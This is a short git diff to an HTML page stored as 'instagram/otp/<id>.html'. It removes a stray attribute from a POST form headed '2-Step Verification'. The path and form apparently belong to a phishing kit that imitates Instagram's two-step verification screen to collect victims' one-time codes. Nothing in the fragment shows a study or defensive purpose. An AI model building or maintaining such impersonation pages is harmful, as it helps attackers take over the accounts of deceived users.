--- a/instagram/otp/657daf104b167f68d1979b9c.html
+++ b/instagram/otp/657daf104b167f68d1979b9c.html
@@ -57,7 +57,7 @@
       <!-- SMARTPHONE SECTION END -->
       <!-- FORM SECTION -->
       <article class="form-area">
-        <form  id="form" method="POST" accept=".">
+        <form  id="form" method="POST" >
           <p class="small-title">2-Step Verification</p>
           <input
             type="text"
